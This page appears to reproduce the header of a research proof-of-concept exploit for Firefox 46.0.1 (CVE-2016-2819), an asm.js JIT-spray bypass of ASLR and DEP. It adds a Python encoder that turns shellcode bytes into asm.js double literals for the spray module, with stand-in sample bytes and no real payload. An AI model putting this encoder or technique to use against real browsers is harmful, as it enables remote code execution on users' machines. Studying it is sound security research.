<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018

Tested on: Firefox 46.0.1 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe

Howto:
1) Serve the PoC over the network and open it in Firefox 46.0.1 32-bit
2) A successful exploit attempt should pop calc.exe

Mozilla Bug Report: https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
Writeup: https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/

- For research purposes only -

(C) Rh0 Mar. 13, 2018
-->
References:
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs
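The header names the technique (an asm.js float constant pool JIT spray) without showing how a payload gets into that pool. The idea is that every double literal an asm.js function uses is materialised by the JIT as its raw 8-byte IEEE-754 encoding, so an attacker who chooses the literals chooses 8 bytes of executable memory at a time; spraying many such modules makes the bytes land at a guessable address. The encoder below is an added illustration written for this page, not the shellcode2asmjs tool and not the PoC's own code. It assumes, and labels as assumptions, the properties a practitioner has to get right: literals are stored little-endian in source order, a literal used twice is stored once, NaN/Infinity bit patterns cannot be written as asm.js literals, and the target is x86 (0x90 NOP padding). The sample bytes are a constructed stand-in, not a payload.

```python
"""Encode raw bytes as asm.js double literals for a float-constant-pool JIT spray.

Added example for this page; not shellcode2asmjs and not the PoC's code.
Assumptions (not stated on the page, labelled here so they can be checked
against the writeup before use):
  * the asm.js JIT stores each double literal as 8 little-endian IEEE-754
    bytes in a contiguous constant pool, in source order;
  * a literal that appears twice is stored only once, so chunks must be unique;
  * NaN and Infinity cannot be spelled as asm.js numeric literals, so a chunk
    whose bit pattern decodes to NaN/Inf cannot be placed in the pool;
  * the target is x86, so 0x90 (NOP) is used as padding.
"""
import math
import struct

NOP = b"\x90"


def literal_to_bytes(lit: str) -> bytes:
    """The 8 bytes the JIT would store for the asm.js double literal `lit`."""
    return struct.pack("<d", float(lit))


def bytes_to_literal(chunk: bytes) -> str:
    """Return an asm.js double literal whose in-memory bytes equal `chunk`."""
    if len(chunk) != 8:
        raise ValueError("a double holds exactly 8 bytes")
    value = struct.unpack("<d", chunk)[0]
    if math.isnan(value) or math.isinf(value):
        # Assumption: no asm.js numeric literal parses to NaN/Inf.
        raise ValueError(f"chunk {chunk.hex()} is NaN/Inf; no asm.js literal")
    lit = repr(value)  # shortest decimal that round-trips the double
    if "." not in lit and "e" not in lit:
        lit += ".0"  # asm.js types a bare integer literal as int, not double
    if literal_to_bytes(lit) != chunk:
        raise ValueError(f"literal {lit} does not round-trip to {chunk.hex()}")
    return lit


def shellcode_to_chunks(code: bytes) -> list:
    """Split `code` into unique 8-byte chunks, NOP-padding the tail."""
    padded = code + NOP * (-len(code) % 8)
    chunks = [padded[i:i + 8] for i in range(0, len(padded), 8)]
    seen = set()
    for c in chunks:
        if c in seen:
            # Assumption: the pool dedupes equal constants, so a repeated
            # chunk would break the contiguous byte sequence.
            raise ValueError(f"duplicate chunk {c.hex()} would be deduped")
        seen.add(c)
    return chunks


def shellcode_to_asmjs(code: bytes) -> str:
    """Emit an asm.js module whose function f() uses every chunk as a literal.

    Each literal is consumed by a double addition on the parameter so the
    compiler has to keep it as a real constant (illustrative pattern; the
    exact statement form used by the PoC is not reproduced here).
    """
    lits = [bytes_to_literal(c) for c in shellcode_to_chunks(code)]
    body = "\n".join(f"        d = +(d + {lit});" for lit in lits)
    return (
        "function spray(stdlib, foreign, heap) {\n"
        '    "use asm";\n'
        "    function f(d) {\n"
        "        d = +d;\n"
        f"{body}\n"
        "        return +d;\n"
        "    }\n"
        "    return { f: f };\n"
        "}\n"
    )


if __name__ == "__main__":
    # Constructed stand-in bytes, not a payload: 24 distinct finite chunks.
    sample = bytes(range(0x01, 0x19))
    print(shellcode_to_asmjs(sample))
```

The module text is what the spraying page would compile repeatedly (for instance by instantiating it in a loop); this block only produces the source. Chunks that collide or decode to NaN/Inf are rejected rather than silently altered, because the fix (reordering instructions, inserting NOPs, or changing register choices) is a decision about the shellcode, not about the encoder.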